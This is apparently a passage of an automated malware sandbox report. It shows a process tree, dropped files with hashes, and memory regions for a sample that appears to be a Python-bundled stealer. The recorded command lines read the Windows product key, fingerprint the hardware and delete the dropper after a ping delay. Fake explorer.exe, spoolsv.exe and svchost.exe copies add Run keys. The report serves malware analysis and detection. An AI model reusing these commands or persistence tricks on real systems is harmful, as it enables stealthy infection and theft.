                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                            4⤵
                                                                              PID:3720
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                5⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                PID:4536
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                              4⤵
                                                                                PID:4708
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic path win32_VideoController get name
                                                                                  5⤵
                                                                                  • Detects videocard installed
                                                                                  PID:3088
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                4⤵
                                                                                  PID:2504
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                    5⤵
                                                                                      PID:2860
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\drver1.exe ""
                                                                                    4⤵
                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                    PID:2696
                                                                                    • C:\Windows\system32\PING.EXE
                                                                                      ping localhost -n 3
                                                                                      5⤵
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      • Runs ping.exe
                                                                                      PID:2856
                                                                              • C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Windows directory
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3232
                                                                                • \??\c:\windows\resources\themes\explorer.exe
                                                                                  c:\windows\resources\themes\explorer.exe
                                                                                  3⤵
                                                                                  • Modifies visiblity of hidden/system files in Explorer
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Windows directory
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1324
                                                                                  • \??\c:\windows\resources\spoolsv.exe
                                                                                    c:\windows\resources\spoolsv.exe SE
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Windows directory
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1628
                                                                                    • \??\c:\windows\resources\svchost.exe
                                                                                      c:\windows\resources\svchost.exe
                                                                                      5⤵
                                                                                      • Modifies visiblity of hidden/system files in Explorer
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Drops file in System32 directory
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3976
                                                                                      • \??\c:\windows\resources\spoolsv.exe
                                                                                        c:\windows\resources\spoolsv.exe PR
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5116
                                                                            • C:\Windows\system32\taskmgr.exe
                                                                              "C:\Windows\system32\taskmgr.exe" /4
                                                                              1⤵
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:4396

                                                                            Network

                                                                            MITRE ATT&CK Enterprise v15

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                              SHA1

                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                              SHA256

                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                              SHA512

                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Filesize

                                                                              944B

                                                                              MD5

                                                                              d28a889fd956d5cb3accfbaf1143eb6f

                                                                              SHA1

                                                                              157ba54b365341f8ff06707d996b3635da8446f7

                                                                              SHA256

                                                                              21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                              SHA512

                                                                              0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              8a7753640b549244dafbbbc068e9bc5b

                                                                              SHA1

                                                                              973287b37dd2c8ef662db9829ec82205793e8e78

                                                                              SHA256

                                                                              a700ed9ed24158a89ecb35d49e0ea31f83ba123073ed07f35f990242e1a00799

                                                                              SHA512

                                                                              0fed225e1fb142050cd8db3a1c104d0fa72c74d673bdc3b3e9259526159c24478d255098c7bd798d936077727ea8c46e4456c393beba66b831724945a573e54b

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Filesize

                                                                              944B

                                                                              MD5

                                                                              59d97011e091004eaffb9816aa0b9abd

                                                                              SHA1

                                                                              1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                                                              SHA256

                                                                              18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                                                              SHA512

                                                                              d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              b2600662b39ee59512f530131c038b45

                                                                              SHA1

                                                                              c417eecbd7fd9c0f143261279c17cdc83783c95c

                                                                              SHA256

                                                                              b2cd3884c706629b0e92856ba2643c4062d98480d38a36e4ac10f6a6695ed8c2

                                                                              SHA512

                                                                              97bbb9a0859b3e01a5d789b5d242c07b35e8f80a7ccf7e2e9af1ff31cf0a3497cc23603754407140a7602bb1a3edd7ec71529a0b9a7460b700ebcd72306bd3af

                                                                            • C:\Users\Admin\AppData\Local\Temp\RES9D59.tmp

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              9795f5571f66c9363ad8092f5218923e

                                                                              SHA1

                                                                              485a8facd38663f83d2cbcb7c946e2f016242ece

                                                                              SHA256

                                                                              b8fc8b9880b1c62de2389bba34d3b78286ddb47003c766aeb8b17be477184709

                                                                              SHA512

                                                                              0d881b631c30fe381a2fe46b1aad115bbfee354cede2f9be6a7b0cfc1b82ab492c9ecc07d653495660f05d53712f2abe1f45c330236ae2782b56845b5fddd049

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\VCRUNTIME140.dll

                                                                              Filesize

                                                                              117KB

                                                                              MD5

                                                                              862f820c3251e4ca6fc0ac00e4092239

                                                                              SHA1

                                                                              ef96d84b253041b090c243594f90938e9a487a9a

                                                                              SHA256

                                                                              36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

                                                                              SHA512

                                                                              2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_bz2.pyd

                                                                              Filesize

                                                                              50KB

                                                                              MD5

                                                                              7727659bb076d34cf0f0ad1c1fc968e6

                                                                              SHA1

                                                                              5d91194bbe6d8caf5eafde938a8d364377b53851

                                                                              SHA256

                                                                              b9a2152a844fb58fb294dc33efd3bd2c266def470bfe4b4edacfb75dd2e3eced

                                                                              SHA512

                                                                              ab4ad49cff143a40c408828e18ea095c2733667ea27e8bbfc4cfa05d433d4c0f8de64b217021b62bcbef538b0d8912a98f53669af3d49acba01e31de6fa4a8c2

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_ctypes.pyd

                                                                              Filesize

                                                                              61KB

                                                                              MD5

                                                                              9527b566dda0b94f93f6def63baac6bb

                                                                              SHA1

                                                                              fee229ec97ac282c9abde88216ef29096b1b4376

                                                                              SHA256

                                                                              456c82d5b49af25839a62e933794dfec3d2afdef10d23a81fad94b53b488fcc0

                                                                              SHA512

                                                                              d2d1a9d5a4cbdf98b40354366b95e4dfb84a42e6a093e4e402fef5652ceaaf79a0eb80d47bad99ccf202baca365739108110aa2b14a82664b794a3490fe16193

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_decimal.pyd

                                                                              Filesize

                                                                              109KB

                                                                              MD5

                                                                              0e2118a943a97b74d428204818210403

                                                                              SHA1

                                                                              abfe4cad38a66a6ff448af946cf7250b8b506a2d

                                                                              SHA256

                                                                              ba390b3078a848f0254548fcb5bef8441dbbcb36467f9c6d9d18dacf92a18ded

                                                                              SHA512

                                                                              e21abbaaf27cc19d386ea8b23117420d3a94e4380c900bd7528972fc9fc763f271c3313431b4ef9b5c336e9cdf0631c0780c2bac4b209ea14c9f2e53710c7de7

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_hashlib.pyd

                                                                              Filesize

                                                                              36KB

                                                                              MD5

                                                                              69da0e0688c8d2b1b6801e63053c3412

                                                                              SHA1

                                                                              85aa9a8a26bf71a923d80690b8c2f9d666a65009

                                                                              SHA256

                                                                              12332eb2c681511bc99bff5a9b14d935933585199f10e57c0f37ebdaa6519ece

                                                                              SHA512

                                                                              5af791409ce722b656775660700048d63dd26055280fe465adc1c53a44071657ef4f036cadb058a65a1e4f57b9dceba431a3bd679c65ca3abe8a80ae004d160f

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_lzma.pyd

                                                                              Filesize

                                                                              88KB

                                                                              MD5

                                                                              7a4dad239486b02ff5106141d7aba3a7

                                                                              SHA1

                                                                              bd0af849dac3322b64b5d44956074fa50961aaca

                                                                              SHA256

                                                                              10856dbfd8c956e24ed04f6d533b8c03a2131a99f3ae427facd7bee9ad98802a

                                                                              SHA512

                                                                              245b5b86a796660983e3ff0297a930f0d64ea4cecf6e6743d3e4b9999c5990c4ecb1600271fff4e1f0a46ccebc74e6aef522585df50080a86bb104e7797e64ae

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_queue.pyd

                                                                              Filesize

                                                                              27KB

                                                                              MD5

                                                                              051b0b941192073345d52298f0129b1f

                                                                              SHA1

                                                                              348cb2c18e7ecbefc45168259adccaf5287161b2

                                                                              SHA256

                                                                              04ca88870ade6c654490268d93360a61965e8ca799f2d52f6c99948b317bde4d

                                                                              SHA512

                                                                              ef78e5d9f5054bbddc97a3a20471ca13e527739c48664f88108fa61b204e1ad98b0da205175650c26cde407775458769a359273afbdc22060502bc018de3b260

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_socket.pyd

                                                                              Filesize

                                                                              46KB

                                                                              MD5

                                                                              301875ace6d58ab5737871a14c163a74

                                                                              SHA1

                                                                              35d41b27e589f8295a00a2adb209b8911e07ce3c

                                                                              SHA256

                                                                              b3895e8d9389dc883ef05898d3e3e49badc6d5e6a9433ea6ca315e2513ad88af

                                                                              SHA512

                                                                              8a22ca71a62fc10b4cc0f17672554ed3feedc315ea118329034c9cc1d132e06767679d5e6180adbb22232ad6d4b42a1152473fddf9a0e50482f45fdc43dc16e7

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_sqlite3.pyd

                                                                              Filesize

                                                                              59KB

                                                                              MD5

                                                                              9bf44fb475f1732df8c14b323cc5ec58

                                                                              SHA1

                                                                              16b1f1c63d9a59307293e0a8607023da2616cbd9

                                                                              SHA256

                                                                              47eb79d84017ed5c4933622166dc0f003a59ff5556998f23385be4d6c06b165a

                                                                              SHA512

                                                                              a97a1059930e1de933b7899a5f115b065f3358376ff85b995ff4158e86c32379acc01185dfcf076a2337af3a81ae949f23b029ebc49e31dc24c4b3d8392c9194

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\_ssl.pyd

                                                                              Filesize

                                                                              67KB

                                                                              MD5

                                                                              e6b2d8917b8a03e21f0af257555767a8

                                                                              SHA1

                                                                              a75d24fa95a6cb27a267ae82fa1006e21e85ed77

                                                                              SHA256

                                                                              2448d2b881511434dc5cfd397369b0f23d43f08446e3bb4772da3eb6d593eb1f

                                                                              SHA512

                                                                              94aab28a1b7aec86ff4b9e932876519660e2069846ec2edb6410a4925fba98cc3f453602e6071741beabb057a9142c3a68906652c37626b053dec93596793239

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\base_library.zip

                                                                              Filesize

                                                                              1.3MB

                                                                              MD5

                                                                              0cb8186855e5a17427aa0f2d16e491a9

                                                                              SHA1

                                                                              8e370a2a864079366d329377bec1a9bbc54b185c

                                                                              SHA256

                                                                              13e24b36c20b3da9914c67b61614b262f3fc1ca7b2ee205ded41acc57865bfef

                                                                              SHA512

                                                                              855ff87e74e4bd4719db5b17e577e5ae6ca5eedd539b379625b28bccdf417f15651a3bacf06d6188c3fcaac5814dee753bf058f59f73c7050a0716aa7e718168

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\blank.aes

                                                                              Filesize

                                                                              107KB

                                                                              MD5

                                                                              2f722263b6cf3a21a5d583ea57427810

                                                                              SHA1

                                                                              30ee6da1762c7b169c6166c46eee046161214428

                                                                              SHA256

                                                                              89a39fc53a82b0c26210c9efcb7ca7c41a98d21e56df399dea3d970ae2ddce0c

                                                                              SHA512

                                                                              65cbcb85f6cb22e94bcefc6b05d42ed234925b6d2e3a1a130f5b0bd030105d78654f68e375d30ae084a4a9a8062bebd9c50302511296521fdd5ae1a0d6f7da94

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\libcrypto-3.dll

                                                                              Filesize

                                                                              1.6MB

                                                                              MD5

                                                                              8377fe5949527dd7be7b827cb1ffd324

                                                                              SHA1

                                                                              aa483a875cb06a86a371829372980d772fda2bf9

                                                                              SHA256

                                                                              88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

                                                                              SHA512

                                                                              c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\libffi-8.dll

                                                                              Filesize

                                                                              29KB

                                                                              MD5

                                                                              08b000c3d990bc018fcb91a1e175e06e

                                                                              SHA1

                                                                              bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                              SHA256

                                                                              135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                              SHA512

                                                                              8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\libssl-3.dll

                                                                              Filesize

                                                                              221KB

                                                                              MD5

                                                                              b2e766f5cf6f9d4dcbe8537bc5bded2f

                                                                              SHA1

                                                                              331269521ce1ab76799e69e9ae1c3b565a838574

                                                                              SHA256

                                                                              3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

                                                                              SHA512

                                                                              5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\python312.dll

                                                                              Filesize

                                                                              1.7MB

                                                                              MD5

                                                                              3c5c6c489c358149c970b3b2e562be5f

                                                                              SHA1

                                                                              2f1077db20405b0a176597ed34a10b4730af3ca9

                                                                              SHA256

                                                                              73a22a12ea3d7f763ed2cea94bb877441f4134b40f043c400648d85565757741

                                                                              SHA512

                                                                              d3fb4e5df409bf2de4f5dc5d02d806aee649a21c339c648248b835c3d5d66ab88312c076c149eaadaa3ce0fb43e6fa293bfa369d8876d6eb18742bd9d12448e3

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\rar.exe

                                                                              Filesize

                                                                              615KB

                                                                              MD5

                                                                              9c223575ae5b9544bc3d69ac6364f75e

                                                                              SHA1

                                                                              8a1cb5ee02c742e937febc57609ac312247ba386

                                                                              SHA256

                                                                              90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                              SHA512

                                                                              57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\rarreg.key

                                                                              Filesize

                                                                              456B

                                                                              MD5

                                                                              4531984cad7dacf24c086830068c4abe

                                                                              SHA1

                                                                              fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                              SHA256

                                                                              58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                              SHA512

                                                                              00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\select.pyd

                                                                              Filesize

                                                                              27KB

                                                                              MD5

                                                                              e49b56f35283df3ac2a92b28f9c95ae6

                                                                              SHA1

                                                                              f5c1c660310a07db7a05b8f05f2e4863c88ed2b3

                                                                              SHA256

                                                                              b60c00672fd0575032c8cb0cfdd7c0559d23c25262c7cc9c8980e05097a3b83c

                                                                              SHA512

                                                                              f8d295885d098650f2c1dcd2349b4f34bcd7cd6a972afce98de12d4fe8a67f37dce25b83b1953d19774f7777e1e9b344da120c8ebbe077cab0b948eb6c913eff

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\sqlite3.dll

                                                                              Filesize

                                                                              644KB

                                                                              MD5

                                                                              7c3f235d50514a42905c355c163f5282

                                                                              SHA1

                                                                              e8e9c430f51051cd8352ab23388359100df6c89b

                                                                              SHA256

                                                                              ed3c74cc5efd251897f2a2562679b6102920ac4b9fedda0e9f045e09889cb331

                                                                              SHA512

                                                                              0bb0d79a84ce20302752733942395b83d754a9fe807c608beec44d507375c37763c0f15edf8bb717d306796966bc0a5d4ef10ef4ac87fb78b98a0c40b41f17c7

                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI7482\unicodedata.pyd

                                                                              Filesize

                                                                              296KB

                                                                              MD5

                                                                              e0c3ec1835a14fb73a00de4a6404e352

                                                                              SHA1

                                                                              b74c43242235441ae8328d5ab6db958e1f8c2743

                                                                              SHA256

                                                                              4e7fe5fe2259260b0651d517fecac4f0f324d66f5e4fb4c90dcb1204b9b5049c

                                                                              SHA512

                                                                              125b7bfba20e691e7ec24d0aff271a0de97ce7d4cbaa0fc4699fb052ce26e3151dd8042e503f41e894468c116073a8619bb35760ef12626d8b506652875c915f

                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lbqjl4ps.gad.ps1

                                                                              Filesize

                                                                              60B

                                                                              MD5

                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                              SHA1

                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                              SHA256

                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                              SHA512

                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                            • C:\Users\Admin\AppData\Local\Temp\drver1.exe 

                                                                              Filesize

                                                                              7.5MB

                                                                              MD5

                                                                              408e44c44167337fac190598ea737f1e

                                                                              SHA1

                                                                              19be6cdfe953b1e9cd122b42b72d7157b9f0b190

                                                                              SHA256

                                                                              b87566e3197d508dc273b16db9a7841099d1fae9237b76c4bf7c0a2f24d549df

                                                                              SHA512

                                                                              c95e389d4314c818f602df40ee9d8dc87af1f5750607a5b30dc4f6c044067210fc8717b136f879548f732cebb01a40757bab25265e99f459a89c70ac66f314bf

                                                                            • C:\Users\Admin\AppData\Local\Temp\odl2qg5n\odl2qg5n.dll

                                                                              Filesize

                                                                              4KB

                                                                              MD5

                                                                              423cbdbe6e3e1c529101246dc11e6942

                                                                              SHA1

                                                                              7e08c235ec2c468a688c4fc14d178764d2aaf1b5

                                                                              SHA256

                                                                              74c310fdd7dad56543677216b81509e6e316a1571a85f09c963e9b588428ee65

                                                                              SHA512

                                                                              fae75b3f2803ec40940eede1047f2e0c4a278b82c1fa50a5fbae68b4f3e451caf26df995c1a8a0b4427ca41348a5fd36293ca59ed0306ab88909b500dfc344b5

                                                                            • C:\Windows\Resources\Themes\icsys.icn.exe

                                                                              Filesize

                                                                              135KB

                                                                              MD5

                                                                              0693ec29b348ccbeb54349aa24398f5d

                                                                              SHA1

                                                                              7f7753492e3ecee6a2059fa312d1715f2688f4ae

                                                                              SHA256

                                                                              d6fa9e7ccd8ab4867eb5249eb3e195fb937b0083e6a1a2bb3528e0c093300f56

                                                                              SHA512

                                                                              02a6750094cd319a33ba0ec64744ab91a3fc1958561fd46901072aaa95a7a18261e384d1f59639d94572d41892c2bff26c119368ab90fa6c9da51304935882c7

                                                                            • C:\Windows\Resources\spoolsv.exe

                                                                              Filesize

                                                                              135KB

                                                                              MD5

                                                                              70a24bae7f43ea26337ec593babcf7c6

                                                                              SHA1

                                                                              072aa4a4e26926cf962e4168bbe1b9089827f797

                                                                              SHA256

                                                                              9bc1f04eb6d4a128005778e68f5446d46e273bfc8fdd57ab26d944addffb5fb1

                                                                              SHA512

                                                                              9931f4325f1c913237daf77d3e781bbadbb04d25b4ba3bdd650247cebbf1fccee019e3e0eaf98b36b76331130cf6ec315a735fd19367ef965c1d28bc30de16a9

                                                                            • C:\Windows\System32\drivers\etc\hosts

                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                              SHA1

                                                                              e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                              SHA256

                                                                              a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                              SHA512

                                                                              c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\odl2qg5n\CSC2F7D2FD4C94445E087F973974C43ED18.TMP

                                                                              Filesize

                                                                              652B

                                                                              MD5

                                                                              9d9ee2b790784b0887bf9519f1b1c8af

                                                                              SHA1

                                                                              9b66c368ff622b2ed308edcf90855874860b7623

                                                                              SHA256

                                                                              663d34c38fc96924171d0251120cf87cf95b85e5f32c21953c61028d3086f0cd

                                                                              SHA512

                                                                              46f74651e21e6b22c693670c49e8c8a12b6249cde43e75da6a7c4878f13272b76aa5507be11c8c5a562762257c0328f16c0c440aa06adc4cf20cd341b0bd9424

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\odl2qg5n\odl2qg5n.0.cs

                                                                              Filesize

                                                                              1004B

                                                                              MD5

                                                                              c76055a0388b713a1eabe16130684dc3

                                                                              SHA1

                                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                                              SHA256

                                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                              SHA512

                                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\odl2qg5n\odl2qg5n.cmdline

                                                                              Filesize

                                                                              607B

                                                                              MD5

                                                                              de8908ea8cd5e73c0c21ad97f4a0fcef

                                                                              SHA1

                                                                              9fd8cea10eeac1700d94acefa7a330db6959eb8a

                                                                              SHA256

                                                                              8e7223921b54342d6988438062cce24fd2f5a0b121e3281d0fd18dfa559f3499

                                                                              SHA512

                                                                              9e49166576e0a0ed0b7ae59c6a1953036ab758dad61898cd830e97c2480f5b20abbf977e48960e4db43c56552a108a62525c37086a8e3cb55433d00d4d604ba4

                                                                            • \??\c:\windows\resources\svchost.exe

                                                                              Filesize

                                                                              135KB

                                                                              MD5

                                                                              8168e33a829b6e880b267b547085c8fa

                                                                              SHA1

                                                                              cdb6bd21b4864022298f12351f148806cc572750

                                                                              SHA256

                                                                              f74d71e3ec9bdd36a111391ed5384ec10034b8d58fdf8e4040adb01a0bcdfdce

                                                                              SHA512

                                                                              ed384c039063718f270c514cad8161275295f254bf131081d74676927aec4015e536dd962bff7c3f1467ce4cf9f44ad3fc08c5876f8943451584b25d07b4ca1e

                                                                            • \??\c:\windows\resources\themes\explorer.exe

                                                                              Filesize

                                                                              135KB

                                                                              MD5

                                                                              be5824203664650f5f9ebf89c8ea0dac

                                                                              SHA1

                                                                              069988a69f009c1fa00f0e2212735f482018e4cf

                                                                              SHA256

                                                                              fe83901a10ed082f1fd2468f1f715be99de5725a8558e536e8c7170043a81ab2

                                                                              SHA512

                                                                              64ebd9c1e329217dcc817890c583af8d418f72d9faca0a3b6ddf2011232d9f051b8f8cdf666b9acd513b0c817c4ce377f6cf773c572e2b6e067fb4745b5a01d2

                                                                            • memory/1048-99-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/1048-0-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/1324-454-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/1628-97-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/1772-141-0x0000025513650000-0x0000025513672000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/2188-389-0x00007FFB69A80000-0x00007FFB6A141000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/2188-133-0x00007FFB79E10000-0x00007FFB79E1D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/2188-127-0x00007FFB777B0000-0x00007FFB777C4000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/2188-135-0x00007FFB68F30000-0x00007FFB6904A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/2188-403-0x00007FFB68F30000-0x00007FFB6904A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/2188-132-0x00007FFB791C0000-0x00007FFB791D9000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/2188-124-0x00007FFB69540000-0x00007FFB69A73000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/2188-117-0x00007FFB7C720000-0x00007FFB7C72D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/2188-115-0x00007FFB79010000-0x00007FFB79029000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/2188-119-0x00007FFB78CA0000-0x00007FFB78CD3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/2188-110-0x00007FFB69A80000-0x00007FFB6A141000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/2188-111-0x00007FFB790F0000-0x00007FFB79114000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/2188-112-0x00007FFB78500000-0x00007FFB7867F000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/2188-113-0x00007FFB7C8B0000-0x00007FFB7C8D5000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/2188-107-0x00007FFB791C0000-0x00007FFB791D9000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/2188-105-0x00007FFB79120000-0x00007FFB7914C000-memory.dmp

                                                                              Filesize

                                                                              176KB

                                                                            • memory/2188-35-0x00007FFB69A80000-0x00007FFB6A141000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/2188-51-0x00007FFB7C8B0000-0x00007FFB7C8D5000-memory.dmp

                                                                              Filesize

                                                                              148KB

